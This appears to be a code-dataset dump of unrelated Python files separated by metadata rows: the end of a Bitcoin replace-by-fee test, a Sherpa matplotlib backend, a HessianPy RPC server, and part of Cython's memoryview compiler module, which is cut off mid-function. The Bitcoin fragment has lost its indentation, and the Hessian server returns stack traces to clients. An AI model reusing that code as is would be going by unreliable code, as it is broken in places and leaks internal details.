tx1b.vout = [CTxOut(int(0.001*COIN), CScript([b'a'*740000]))]
tx1b_hex = txToHex(tx1b)
# Verify tx1b cannot replace tx1a.
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Use prioritisetransaction to set tx1a's fee to 0.
self.nodes[0].prioritisetransaction(tx1a_txid, 0, int(-0.1*COIN))
# Now tx1b should be able to replace tx1a
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
assert(tx1b_txid in self.nodes[0].getrawmempool())
# 2. Check that absolute fee checks use modified fee.
tx1_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx2a_hex = txToHex(tx2a)
tx2a_txid = self.nodes[0].sendrawtransaction(tx2a_hex, True)
# Lower fee, but we'll prioritise it
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(1.01*COIN), CScript([b'a']))]
tx2b.rehash()
tx2b_hex = txToHex(tx2b)
# Verify tx2b cannot replace tx2a.
try:
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Now prioritise tx2b to have a higher modified fee
self.nodes[0].prioritisetransaction(tx2b.hash, 0, int(0.1*COIN))
# tx2b should now be accepted
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, True)
assert(tx2b_txid in self.nodes[0].getrawmempool())
if __name__ == '__main__':
ReplaceByFeeTest().main()
| mit | 3,186,034,614,589,007,400 | 36.286441 | 105 | 0.581936 | false |
anetasie/sherpa | sherpa/astro/datastack/plot_backend/plot_matplotlib.py | 4 | 2185 | #
# Copyright (C) 2010, 2014, 2015 Smithsonian Astrophysical Observatory
#
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
Plotting routines for the data stack module provided by matplotlib.
"""
import matplotlib.pyplot as plt
name = "pylab_backend"
def initialize_backend():
"""Ensure that the plotting backend is initialized.
"""
pass
def initialize_plot(dataset, ids):
"""Create the plot window or figure for the given dataset.
Parameters
----------
dataset : str or int
The dataset.
ids : array_like
The identifier array from the DataStack object.
See Also
--------
select_plot
"""
plt.figure(ids.index(dataset['id']) + 1)
def select_plot(dataset, ids):
"""Select the plot window or figure for the given dataset.
The plot for this dataset is assumed to have been created.
Parameters
----------
dataset : str or int
The dataset.
ids : array_like
The identifier array from the DataStack object.
See Also
--------
initialize_plot
"""
plt.figure(ids.index(dataset['id']) + 1)
def save_plot(*args, **kwargs):
"""Save the current plot."""
plt.savefig(*args, **kwargs)
# How is this different from the _print_window/savefig methods
# of the DataStack class?
plot_savefig = plt.savefig
plot_xlabel = plt.xlabel
plot_ylabel = plt.ylabel
plot_title = plt.title
plot_xlim = plt.xlim
plot_ylim = plt.ylim
plot_set_xscale = plt.xscale
plot_set_yscale = plt.yscale
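# Illustrative usage of this backend (a sketch, not part of the module API;
# the id values below are made up, but the dataset dict must carry an 'id'
# key as the functions above expect):
#
#   ids = ['obs1.pha', 'obs2.pha']
#   initialize_plot({'id': 'obs1.pha'}, ids)   # selects matplotlib figure 1
#   plot_xlabel('Energy (keV)')
#   plot_title('Stacked fit')
#   save_plot('stack.png')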
| gpl-3.0 | 2,775,161,598,395,627,500 | 23.829545 | 74 | 0.684668 | false |
PetrGlad/hessianpy | hessian/server.py | 1 | 3978 | #
# Hessian protocol implementation
# This file contains simple RPC server code.
#
# Protocol specification can be found here:
# http://www.caucho.com/resin-3.0/protocols/hessian-1.0-spec.xtp
#
# Copyright 2006-2007 Petr Gladkikh (batyi at users sourceforge net)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import hessian
from StringIO import StringIO
import traceback
import socket
__revision__ = "$Rev$"
class HessianHTTPRequestHandler(BaseHTTPRequestHandler):
    """Subclasses should define a class member message_map which maps method
    names to function objects. """
MAX_CHUNK_SIZE = 2 ^ 12
def do_POST(self):
try:
ctx = hessian.ParseContext(self.rfile)
(method, headers, params) = hessian.Call().read(ctx, ctx.read(1))
except Exception as e:
self.send_error(500, "Can not parse call request. Error: " + str(e))
return
        if method not in self.message_map:
self.send_error(500, "Method '" + method + "' is not found")
return
succeeded = True
try:
result = self.message_map[method](*([self] + params))
except Exception as e:
stackTrace = traceback.format_exc()
succeeded = False
result = {"stackTrace" : stackTrace, "args" : e.args}
result.update(e.__dict__)
try:
sio = StringIO()
hessian.Reply().write(
hessian.WriteContext(sio),
(headers, succeeded, result))
reply = sio.getvalue()
except Exception:
stackTrace = traceback.format_exc()
# todo write this to logs
self.send_error(500, "Can not send response for '" + method + "'\n" + stackTrace)
return
self.send_response(200, "OK")
self.send_header("Content-type", "application/octet-stream")
self.send_header("Content-Length", str(len(reply)))
self.end_headers()
self.wfile.write(reply)
class ServerStoppedError(Exception):
pass
class StoppableHTTPServer(HTTPServer):
"""
Code adapted from Python CookBook
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/425210
"""
def server_bind(self):
HTTPServer.server_bind(self)
self.run = True
def get_request(self):
while self.run:
return self.socket.accept()
raise ServerStoppedError()
def stop(self):
self.run = False
def serve(self):
try:
while self.run:
self.handle_request()
except ServerStoppedError:
return
# ---------------------------------------------------------
# Server usage example
def hello():
return "Hello, from HessianPy!"
class TestHandler(HessianHTTPRequestHandler):
message_map = {"hello" : hello}
if __name__ == "__main__":
# Example code
print "Starting test server"
server_address = ('localhost', 9001)
httpd = StoppableHTTPServer(server_address, TestHandler)
print "Serving from ", server_address
httpd.serve()
import time
time.sleep(200)
httpd.stop()
print "Stopping test server"
| apache-2.0 | 235,882,162,371,547,040 | 29.6 | 93 | 0.590749 | false |
rguillebert/CythonCTypesBackend | Cython/Compiler/MemoryView.py | 1 | 33248 | from Errors import CompileError, error
import ExprNodes
from ExprNodes import IntNode, NameNode, AttributeNode
import Options
from Code import UtilityCode, TempitaUtilityCode
from UtilityCode import CythonUtilityCode
import Buffer
import PyrexTypes
import ModuleNode
START_ERR = "Start must not be given."
STOP_ERR = "Axis specification only allowed in the 'step' slot."
STEP_ERR = "Step must be omitted, 1, or a valid specifier."
BOTH_CF_ERR = "Cannot specify an array that is both C and Fortran contiguous."
INVALID_ERR = "Invalid axis specification."
NOT_CIMPORTED_ERR = "Variable was not cimported from cython.view"
EXPR_ERR = "no expressions allowed in axis spec, only names and literals."
CF_ERR = "Invalid axis specification for a C/Fortran contiguous array."
ERR_UNINITIALIZED = ("Cannot check if memoryview %s is initialized without the "
"GIL, consider using initializedcheck(False)")
def err_if_nogil_initialized_check(pos, env, name='variable'):
"This raises an exception at runtime now"
pass
#if env.nogil and env.directives['initializedcheck']:
#error(pos, ERR_UNINITIALIZED % name)
def concat_flags(*flags):
return "(%s)" % "|".join(flags)
format_flag = "PyBUF_FORMAT"
memview_c_contiguous = "(PyBUF_C_CONTIGUOUS | PyBUF_FORMAT | PyBUF_WRITABLE)"
memview_f_contiguous = "(PyBUF_F_CONTIGUOUS | PyBUF_FORMAT | PyBUF_WRITABLE)"
memview_any_contiguous = "(PyBUF_ANY_CONTIGUOUS | PyBUF_FORMAT | PyBUF_WRITABLE)"
memview_full_access = "PyBUF_FULL"
#memview_strided_access = "PyBUF_STRIDED"
memview_strided_access = "PyBUF_RECORDS"
MEMVIEW_DIRECT = '__Pyx_MEMVIEW_DIRECT'
MEMVIEW_PTR = '__Pyx_MEMVIEW_PTR'
MEMVIEW_FULL = '__Pyx_MEMVIEW_FULL'
MEMVIEW_CONTIG = '__Pyx_MEMVIEW_CONTIG'
MEMVIEW_STRIDED= '__Pyx_MEMVIEW_STRIDED'
MEMVIEW_FOLLOW = '__Pyx_MEMVIEW_FOLLOW'
_spec_to_const = {
'direct' : MEMVIEW_DIRECT,
'ptr' : MEMVIEW_PTR,
'full' : MEMVIEW_FULL,
'contig' : MEMVIEW_CONTIG,
'strided': MEMVIEW_STRIDED,
'follow' : MEMVIEW_FOLLOW,
}
_spec_to_abbrev = {
'direct' : 'd',
'ptr' : 'p',
'full' : 'f',
'contig' : 'c',
'strided' : 's',
'follow' : '_',
}
memslice_entry_init = "{ 0, 0, { 0 }, { 0 }, { 0 } }"
memview_name = u'memoryview'
memview_typeptr_cname = '__pyx_memoryview_type'
memview_objstruct_cname = '__pyx_memoryview_obj'
memviewslice_cname = u'__Pyx_memviewslice'
def put_init_entry(mv_cname, code):
code.putln("%s.data = NULL;" % mv_cname)
code.putln("%s.memview = NULL;" % mv_cname)
def mangle_dtype_name(dtype):
# a dumb wrapper for now; move Buffer.mangle_dtype_name in here later?
import Buffer
return Buffer.mangle_dtype_name(dtype)
#def axes_to_str(axes):
# return "".join([access[0].upper()+packing[0] for (access, packing) in axes])
def put_acquire_memoryviewslice(lhs_cname, lhs_type, lhs_pos, rhs, code,
have_gil=False, first_assignment=True):
"We can avoid decreffing the lhs if we know it is the first assignment"
assert rhs.type.is_memoryviewslice
pretty_rhs = isinstance(rhs, NameNode) or rhs.result_in_temp()
if pretty_rhs:
rhstmp = rhs.result()
else:
rhstmp = code.funcstate.allocate_temp(lhs_type, manage_ref=False)
code.putln("%s = %s;" % (rhstmp, rhs.result_as(lhs_type)))
# Allow uninitialized assignment
#code.putln(code.put_error_if_unbound(lhs_pos, rhs.entry))
put_assign_to_memviewslice(lhs_cname, rhs, rhstmp, lhs_type, code,
have_gil=have_gil, first_assignment=first_assignment)
if not pretty_rhs:
code.funcstate.release_temp(rhstmp)
def put_assign_to_memviewslice(lhs_cname, rhs, rhs_cname, memviewslicetype, code,
have_gil=False, first_assignment=False):
if not first_assignment:
code.put_xdecref_memoryviewslice(lhs_cname, have_gil=have_gil)
if rhs.is_name:
code.put_incref_memoryviewslice(rhs_cname, have_gil=have_gil)
code.putln("%s = %s;" % (lhs_cname, rhs_cname))
#code.putln("%s.memview = %s.memview;" % (lhs_cname, rhs_cname))
#code.putln("%s.data = %s.data;" % (lhs_cname, rhs_cname))
#for i in range(memviewslicetype.ndim):
# tup = (lhs_cname, i, rhs_cname, i)
# code.putln("%s.shape[%d] = %s.shape[%d];" % tup)
# code.putln("%s.strides[%d] = %s.strides[%d];" % tup)
# code.putln("%s.suboffsets[%d] = %s.suboffsets[%d];" % tup)
def get_buf_flags(specs):
is_c_contig, is_f_contig = is_cf_contig(specs)
if is_c_contig:
return memview_c_contiguous
elif is_f_contig:
return memview_f_contiguous
access, packing = zip(*specs)
if 'full' in access or 'ptr' in access:
return memview_full_access
else:
return memview_strided_access
def insert_newaxes(memoryviewtype, n):
axes = [('direct', 'strided')] * n
axes.extend(memoryviewtype.axes)
return PyrexTypes.MemoryViewSliceType(memoryviewtype.dtype, axes)
def broadcast_types(src, dst):
n = abs(src.ndim - dst.ndim)
if src.ndim < dst.ndim:
return insert_newaxes(src, n), dst
else:
return src, insert_newaxes(dst, n)
def src_conforms_to_dst(src, dst, broadcast=False):
'''
returns True if src conforms to dst, False otherwise.
If conformable, the types are the same, the ndims are equal, and each axis spec is conformable.
Any packing/access spec is conformable to itself.
'direct' and 'ptr' are conformable to 'full'.
'contig' and 'follow' are conformable to 'strided'.
Any other combo is not conformable.
'''
if src.dtype != dst.dtype:
return False
if src.ndim != dst.ndim:
if broadcast:
src, dst = broadcast_types(src, dst)
else:
return False
for src_spec, dst_spec in zip(src.axes, dst.axes):
src_access, src_packing = src_spec
dst_access, dst_packing = dst_spec
if src_access != dst_access and dst_access != 'full':
return False
if src_packing != dst_packing and dst_packing != 'strided':
return False
return True
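# For instance (illustrative spec lists in the (access, packing) form used
# above): a C-contiguous 2D source [('direct', 'follow'), ('direct', 'contig')]
# conforms to a generic strided destination [('direct', 'strided'),
# ('direct', 'strided')], but not the other way around, because 'strided' is
# not conformable to 'contig'.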
def valid_memslice_dtype(dtype, i=0):
"""
Return whether type dtype can be used as the base type of a
memoryview slice.
We support structs, numeric types and objects
"""
if dtype.is_complex and dtype.real_type.is_int:
return False
if dtype.is_struct and dtype.kind == 'struct':
for member in dtype.scope.var_entries:
if not valid_memslice_dtype(member.type):
return False
return True
return (
dtype.is_error or
# Pointers are not valid (yet)
# (dtype.is_ptr and valid_memslice_dtype(dtype.base_type)) or
(dtype.is_array and i < 8 and
valid_memslice_dtype(dtype.base_type, i + 1)) or
dtype.is_numeric or
dtype.is_pyobject or
dtype.is_fused or # accept this as it will be replaced by specializations later
(dtype.is_typedef and valid_memslice_dtype(dtype.typedef_base_type))
)
def validate_memslice_dtype(pos, dtype):
if not valid_memslice_dtype(dtype):
error(pos, "Invalid base type for memoryview slice: %s" % dtype)
class MemoryViewSliceBufferEntry(Buffer.BufferEntry):
def __init__(self, entry):
self.entry = entry
self.type = entry.type
self.cname = entry.cname
self.buf_ptr = "%s.data" % self.cname
dtype = self.entry.type.dtype
dtype = PyrexTypes.CPtrType(dtype)
self.buf_ptr_type = dtype
def get_buf_suboffsetvars(self):
return self._for_all_ndim("%s.suboffsets[%d]")
def get_buf_stridevars(self):
return self._for_all_ndim("%s.strides[%d]")
def get_buf_shapevars(self):
return self._for_all_ndim("%s.shape[%d]")
def generate_buffer_lookup_code(self, code, index_cnames):
axes = [(dim, index_cnames[dim], access, packing)
for dim, (access, packing) in enumerate(self.type.axes)]
return self._generate_buffer_lookup_code(code, axes)
def _generate_buffer_lookup_code(self, code, axes, cast_result=True):
bufp = self.buf_ptr
type_decl = self.type.dtype.declaration_code("")
for dim, index, access, packing in axes:
shape = "%s.shape[%d]" % (self.cname, dim)
stride = "%s.strides[%d]" % (self.cname, dim)
suboffset = "%s.suboffsets[%d]" % (self.cname, dim)
flag = get_memoryview_flag(access, packing)
if flag in ("generic", "generic_contiguous"):
# Note: we cannot do cast tricks to avoid stride multiplication
# for generic_contiguous, as we may have to do (dtype *)
# or (dtype **) arithmetic, we won't know which unless
# we check suboffsets
code.globalstate.use_utility_code(memviewslice_index_helpers)
bufp = ('__pyx_memviewslice_index_full(%s, %s, %s, %s)' %
(bufp, index, stride, suboffset))
elif flag == "indirect":
bufp = "(%s + %s * %s)" % (bufp, index, stride)
bufp = ("(*((char **) %s) + %s)" % (bufp, suboffset))
elif flag == "indirect_contiguous":
# Note: we do char ** arithmetic
bufp = "(*((char **) %s + %s) + %s)" % (bufp, index, suboffset)
elif flag == "strided":
bufp = "(%s + %s * %s)" % (bufp, index, stride)
else:
assert flag == 'contiguous', flag
bufp = '((char *) (((%s *) %s) + %s))' % (type_decl, bufp, index)
bufp = '( /* dim=%d */ %s )' % (dim, bufp)
if cast_result:
return "((%s *) %s)" % (type_decl, bufp)
return bufp
def generate_buffer_slice_code(self, code, indices, dst, have_gil,
have_slices):
"""
Slice a memoryviewslice.
indices - list of index nodes. If not a SliceNode, then it must be
coercible to Py_ssize_t
Simply call __pyx_memoryview_slice_memviewslice with the right
arguments.
"""
new_ndim = 0
src = self.cname
def load_slice_util(name, dict):
proto, impl = TempitaUtilityCode.load_as_string(
name, "MemoryView_C.c", context=dict)
return impl
all_dimensions_direct = True
for access, packing in self.type.axes:
if access != 'direct':
all_dimensions_direct = False
break
no_suboffset_dim = all_dimensions_direct and not have_slices
if not no_suboffset_dim:
suboffset_dim = code.funcstate.allocate_temp(
PyrexTypes.c_int_type, False)
code.putln("%s = -1;" % suboffset_dim)
code.putln("%(dst)s.data = %(src)s.data;" % locals())
code.putln("%(dst)s.memview = %(src)s.memview;" % locals())
code.put_incref_memoryviewslice(dst)
for dim, index in enumerate(indices):
error_goto = code.error_goto(index.pos)
if not isinstance(index, ExprNodes.SliceNode):
# normal index
idx = index.result()
access, packing = self.type.axes[dim]
if access == 'direct':
indirect = False
else:
indirect = True
generic = (access == 'full')
if new_ndim != 0:
return error(index.pos,
"All preceding dimensions must be "
"indexed and not sliced")
d = locals()
code.put(load_slice_util("SliceIndex", d))
else:
# slice, unspecified dimension, or part of ellipsis
d = locals()
for s in "start stop step".split():
idx = getattr(index, s)
have_idx = d['have_' + s] = not idx.is_none
if have_idx:
d[s] = idx.result()
else:
d[s] = "0"
if (not d['have_start'] and
not d['have_stop'] and
not d['have_step']):
# full slice (:), simply copy over the extent, stride
# and suboffset. Also update suboffset_dim if needed
access, packing = self.type.axes[dim]
d['access'] = access
code.put(load_slice_util("SimpleSlice", d))
else:
code.put(load_slice_util("ToughSlice", d))
new_ndim += 1
if not no_suboffset_dim:
code.funcstate.release_temp(suboffset_dim)
def empty_slice(pos):
none = ExprNodes.NoneNode(pos)
return ExprNodes.SliceNode(pos, start=none,
stop=none, step=none)
def unellipsify(indices, ndim):
result = []
seen_ellipsis = False
have_slices = False
for index in indices:
if isinstance(index, ExprNodes.EllipsisNode):
have_slices = True
full_slice = empty_slice(index.pos)
if seen_ellipsis:
result.append(full_slice)
else:
nslices = ndim - len(indices) + 1
result.extend([full_slice] * nslices)
seen_ellipsis = True
else:
have_slices = have_slices or isinstance(index, ExprNodes.SliceNode)
result.append(index)
if len(result) < ndim:
have_slices = True
nslices = ndim - len(result)
result.extend([empty_slice(indices[-1].pos)] * nslices)
return have_slices, result
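# Example of the expansion performed above (assuming ndim == 3): an index list
# [Ellipsis, i] becomes (True, [full_slice, full_slice, i]), and [i] alone
# becomes (True, [i, full_slice, full_slice]) because trailing dimensions are
# padded with empty slices.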
def get_memoryview_flag(access, packing):
if access == 'full' and packing in ('strided', 'follow'):
return 'generic'
elif access == 'full' and packing == 'contig':
return 'generic_contiguous'
elif access == 'ptr' and packing in ('strided', 'follow'):
return 'indirect'
elif access == 'ptr' and packing == 'contig':
return 'indirect_contiguous'
elif access == 'direct' and packing in ('strided', 'follow'):
return 'strided'
else:
assert (access, packing) == ('direct', 'contig'), (access, packing)
return 'contiguous'
def get_is_contig_func_name(c_or_f, ndim):
return "__pyx_memviewslice_is_%s_contig%d" % (c_or_f, ndim)
def get_is_contig_utility(c_contig, ndim):
C = dict(context, ndim=ndim)
if c_contig:
utility = load_memview_c_utility("MemviewSliceIsCContig", C,
requires=[is_contig_utility])
else:
utility = load_memview_c_utility("MemviewSliceIsFContig", C,
requires=[is_contig_utility])
return utility
def copy_src_to_dst_cname():
return "__pyx_memoryview_copy_contents"
def verify_direct_dimensions(node):
for access, packing in node.type.axes:
if access != 'direct':
            error(node.pos, "All dimensions must be direct")
def copy_broadcast_memview_src_to_dst(src, dst, code):
"""
Copy the contents of slice src to slice dst. Does not support indirect
slices.
"""
verify_direct_dimensions(src)
verify_direct_dimensions(dst)
code.putln(code.error_goto_if_neg(
"%s(%s, %s, %d, %d, %d)" % (copy_src_to_dst_cname(),
src.result(), dst.result(),
src.type.ndim, dst.type.ndim,
dst.type.dtype.is_pyobject),
dst.pos))
def get_1d_fill_scalar_func(type, code):
dtype = type.dtype
type_decl = dtype.declaration_code("")
dtype_name = mangle_dtype_name(dtype)
context = dict(dtype_name=dtype_name, type_decl=type_decl)
utility = load_memview_c_utility("FillStrided1DScalar", context)
code.globalstate.use_utility_code(utility)
return '__pyx_fill_slice_%s' % dtype_name
def assign_scalar(dst, scalar, code):
"""
Assign a scalar to a slice. dst must be a temp, scalar will be assigned
to a correct type and not just something assignable.
"""
verify_direct_dimensions(dst)
dtype = dst.type.dtype
type_decl = dtype.declaration_code("")
slice_decl = dst.type.declaration_code("")
code.begin_block()
code.putln("%s __pyx_temp_scalar = %s;" % (type_decl, scalar.result()))
if dst.result_in_temp() or (dst.base.is_name and
isinstance(dst.index, ExprNodes.EllipsisNode)):
dst_temp = dst.result()
else:
code.putln("%s __pyx_temp_slice = %s;" % (slice_decl, dst.result()))
dst_temp = "__pyx_temp_slice"
# with slice_iter(dst.type, dst_temp, dst.type.ndim, code) as p:
slice_iter_obj = slice_iter(dst.type, dst_temp, dst.type.ndim, code)
p = slice_iter_obj.start_loops()
if dtype.is_pyobject:
code.putln("Py_DECREF(*(PyObject **) %s);" % p)
code.putln("*((%s *) %s) = __pyx_temp_scalar;" % (type_decl, p))
if dtype.is_pyobject:
code.putln("Py_INCREF(__pyx_temp_scalar);")
slice_iter_obj.end_loops()
code.end_block()
def slice_iter(slice_type, slice_temp, ndim, code):
if slice_type.is_c_contig or slice_type.is_f_contig:
return ContigSliceIter(slice_type, slice_temp, ndim, code)
else:
return StridedSliceIter(slice_type, slice_temp, ndim, code)
class SliceIter(object):
def __init__(self, slice_type, slice_temp, ndim, code):
self.slice_type = slice_type
self.slice_temp = slice_temp
self.code = code
self.ndim = ndim
class ContigSliceIter(SliceIter):
def start_loops(self):
code = self.code
code.begin_block()
type_decl = self.slice_type.dtype.declaration_code("")
total_size = ' * '.join("%s.shape[%d]" % (self.slice_temp, i)
for i in range(self.ndim))
code.putln("Py_ssize_t __pyx_temp_extent = %s;" % total_size)
code.putln("Py_ssize_t __pyx_temp_idx;")
code.putln("%s *__pyx_temp_pointer = (%s *) %s.data;" % (
type_decl, type_decl, self.slice_temp))
code.putln("for (__pyx_temp_idx = 0; "
"__pyx_temp_idx < __pyx_temp_extent; "
"__pyx_temp_idx++) {")
return "__pyx_temp_pointer"
def end_loops(self):
self.code.putln("__pyx_temp_pointer += 1;")
self.code.putln("}")
self.code.end_block()
class StridedSliceIter(SliceIter):
def start_loops(self):
code = self.code
code.begin_block()
for i in range(self.ndim):
t = i, self.slice_temp, i
code.putln("Py_ssize_t __pyx_temp_extent_%d = %s.shape[%d];" % t)
code.putln("Py_ssize_t __pyx_temp_stride_%d = %s.strides[%d];" % t)
code.putln("char *__pyx_temp_pointer_%d;" % i)
code.putln("Py_ssize_t __pyx_temp_idx_%d;" % i)
code.putln("__pyx_temp_pointer_0 = %s.data;" % self.slice_temp)
for i in range(self.ndim):
if i > 0:
code.putln("__pyx_temp_pointer_%d = __pyx_temp_pointer_%d;" % (i, i - 1))
code.putln("for (__pyx_temp_idx_%d = 0; "
"__pyx_temp_idx_%d < __pyx_temp_extent_%d; "
"__pyx_temp_idx_%d++) {" % (i, i, i, i))
return "__pyx_temp_pointer_%d" % (self.ndim - 1)
def end_loops(self):
code = self.code
for i in range(self.ndim - 1, -1, -1):
code.putln("__pyx_temp_pointer_%d += __pyx_temp_stride_%d;" % (i, i))
code.putln("}")
code.end_block()
def copy_c_or_fortran_cname(memview):
if memview.is_c_contig:
c_or_f = 'c'
else:
c_or_f = 'f'
return "__pyx_memoryview_copy_slice_%s_%s" % (
memview.specialization_suffix(), c_or_f)
def get_copy_new_utility(pos, from_memview, to_memview):
if from_memview.dtype != to_memview.dtype:
return error(pos, "dtypes must be the same!")
if len(from_memview.axes) != len(to_memview.axes):
return error(pos, "number of dimensions must be same")
if not (to_memview.is_c_contig or to_memview.is_f_contig):
return error(pos, "to_memview must be c or f contiguous.")
for (access, packing) in from_memview.axes:
if access != 'direct':
return error(
pos, "cannot handle 'full' or 'ptr' access at this time.")
if to_memview.is_c_contig:
mode = 'c'
contig_flag = memview_c_contiguous
elif to_memview.is_f_contig:
mode = 'fortran'
contig_flag = memview_f_contiguous
return load_memview_c_utility(
"CopyContentsUtility",
context=dict(
context,
mode=mode,
dtype_decl=to_memview.dtype.declaration_code(''),
contig_flag=contig_flag,
ndim=to_memview.ndim,
func_cname=copy_c_or_fortran_cname(to_memview),
dtype_is_object=int(to_memview.dtype.is_pyobject)),
requires=[copy_contents_new_utility])
def get_axes_specs(env, axes):
'''
get_axes_specs(env, axes) -> list of (access, packing) specs for each axis.
access is one of 'full', 'ptr' or 'direct'
packing is one of 'contig', 'strided' or 'follow'
'''
cythonscope = env.global_scope().context.cython_scope
cythonscope.load_cythonscope()
viewscope = cythonscope.viewscope
access_specs = tuple([viewscope.lookup(name)
for name in ('full', 'direct', 'ptr')])
packing_specs = tuple([viewscope.lookup(name)
for name in ('contig', 'strided', 'follow')])
is_f_contig, is_c_contig = False, False
default_access, default_packing = 'direct', 'strided'
cf_access, cf_packing = default_access, 'follow'
axes_specs = []
# analyse all axes.
for idx, axis in enumerate(axes):
if not axis.start.is_none:
raise CompileError(axis.start.pos, START_ERR)
if not axis.stop.is_none:
raise CompileError(axis.stop.pos, STOP_ERR)
if axis.step.is_none:
axes_specs.append((default_access, default_packing))
elif isinstance(axis.step, IntNode):
# the packing for the ::1 axis is contiguous,
# all others are cf_packing.
if axis.step.compile_time_value(env) != 1:
raise CompileError(axis.step.pos, STEP_ERR)
axes_specs.append((cf_access, 'cfcontig'))
elif isinstance(axis.step, (NameNode, AttributeNode)):
entry = _get_resolved_spec(env, axis.step)
if entry.name in view_constant_to_access_packing:
axes_specs.append(view_constant_to_access_packing[entry.name])
else:
                raise CompileError(axis.step.pos, INVALID_ERR)
else:
raise CompileError(axis.step.pos, INVALID_ERR)
# First, find out if we have a ::1 somewhere
contig_dim = 0
is_contig = False
for idx, (access, packing) in enumerate(axes_specs):
if packing == 'cfcontig':
if is_contig:
raise CompileError(axis.step.pos, BOTH_CF_ERR)
contig_dim = idx
axes_specs[idx] = (access, 'contig')
is_contig = True
if is_contig:
# We have a ::1 somewhere, see if we're C or Fortran contiguous
if contig_dim == len(axes) - 1:
is_c_contig = True
else:
is_f_contig = True
if contig_dim and not axes_specs[contig_dim - 1][0] in ('full', 'ptr'):
raise CompileError(axes[contig_dim].pos,
"Fortran contiguous specifier must follow an indirect dimension")
if is_c_contig:
# Contiguous in the last dimension, find the last indirect dimension
contig_dim = -1
for idx, (access, packing) in enumerate(reversed(axes_specs)):
if access in ('ptr', 'full'):
contig_dim = len(axes) - idx - 1
# Replace 'strided' with 'follow' for any dimension following the last
# indirect dimension, the first dimension or the dimension following
# the ::1.
# int[::indirect, ::1, :, :]
# ^ ^
# int[::indirect, :, :, ::1]
# ^ ^
start = contig_dim + 1
stop = len(axes) - is_c_contig
for idx, (access, packing) in enumerate(axes_specs[start:stop]):
idx = contig_dim + 1 + idx
if access != 'direct':
raise CompileError(axes[idx].pos,
"Indirect dimension may not follow "
"Fortran contiguous dimension")
if packing == 'contig':
raise CompileError(axes[idx].pos,
"Dimension may not be contiguous")
axes_specs[idx] = (access, cf_packing)
if is_c_contig:
# For C contiguity, we need to fix the 'contig' dimension
# after the loop
a, p = axes_specs[-1]
axes_specs[-1] = a, 'contig'
validate_axes_specs([axis.start.pos for axis in axes],
axes_specs,
is_c_contig,
is_f_contig)
return axes_specs
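# For example (a sketch of the outcome for a plain 2D C-contiguous declaration
# such as int[:, ::1]): the ::1 axis is detected as the contiguous dimension,
# the preceding axis is rewritten from 'strided' to 'follow', and the returned
# specs are [('direct', 'follow'), ('direct', 'contig')].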
def all(it):
for item in it:
if not item:
return False
return True
def is_cf_contig(specs):
is_c_contig = is_f_contig = False
if (len(specs) == 1 and specs == [('direct', 'contig')]):
is_c_contig = True
elif (specs[-1] == ('direct','contig') and
all([axis == ('direct','follow') for axis in specs[:-1]])):
# c_contiguous: 'follow', 'follow', ..., 'follow', 'contig'
is_c_contig = True
elif (len(specs) > 1 and
specs[0] == ('direct','contig') and
all([axis == ('direct','follow') for axis in specs[1:]])):
# f_contiguous: 'contig', 'follow', 'follow', ..., 'follow'
is_f_contig = True
return is_c_contig, is_f_contig
def get_mode(specs):
is_c_contig, is_f_contig = is_cf_contig(specs)
if is_c_contig:
return 'c'
elif is_f_contig:
return 'fortran'
for access, packing in specs:
if access in ('ptr', 'full'):
return 'full'
return 'strided'
view_constant_to_access_packing = {
'generic': ('full', 'strided'),
'strided': ('direct', 'strided'),
'indirect': ('ptr', 'strided'),
'generic_contiguous': ('full', 'contig'),
'contiguous': ('direct', 'contig'),
'indirect_contiguous': ('ptr', 'contig'),
}
def validate_axes_specs(positions, specs, is_c_contig, is_f_contig):
packing_specs = ('contig', 'strided', 'follow')
access_specs = ('direct', 'ptr', 'full')
# is_c_contig, is_f_contig = is_cf_contig(specs)
has_contig = has_follow = has_strided = has_generic_contig = False
last_indirect_dimension = -1
for idx, (access, packing) in enumerate(specs):
if access == 'ptr':
last_indirect_dimension = idx
for idx, pos, (access, packing) in zip(xrange(len(specs)), positions, specs):
if not (access in access_specs and
packing in packing_specs):
raise CompileError(pos, "Invalid axes specification.")
if packing == 'strided':
has_strided = True
elif packing == 'contig':
if has_contig:
raise CompileError(pos, "Only one direct contiguous "
"axis may be specified.")
valid_contig_dims = last_indirect_dimension + 1, len(specs) - 1
if idx not in valid_contig_dims and access != 'ptr':
if last_indirect_dimension + 1 != len(specs) - 1:
dims = "dimensions %d and %d" % valid_contig_dims
else:
dims = "dimension %d" % valid_contig_dims[0]
raise CompileError(pos, "Only %s may be contiguous and direct" % dims)
has_contig = access != 'ptr'
elif packing == 'follow':
if has_strided:
raise CompileError(pos, "A memoryview cannot have both follow and strided axis specifiers.")
if not (is_c_contig or is_f_contig):
raise CompileError(pos, "Invalid use of the follow specifier.")
if access in ('ptr', 'full'):
has_strided = False
def _get_resolved_spec(env, spec):
# spec must be a NameNode or an AttributeNode
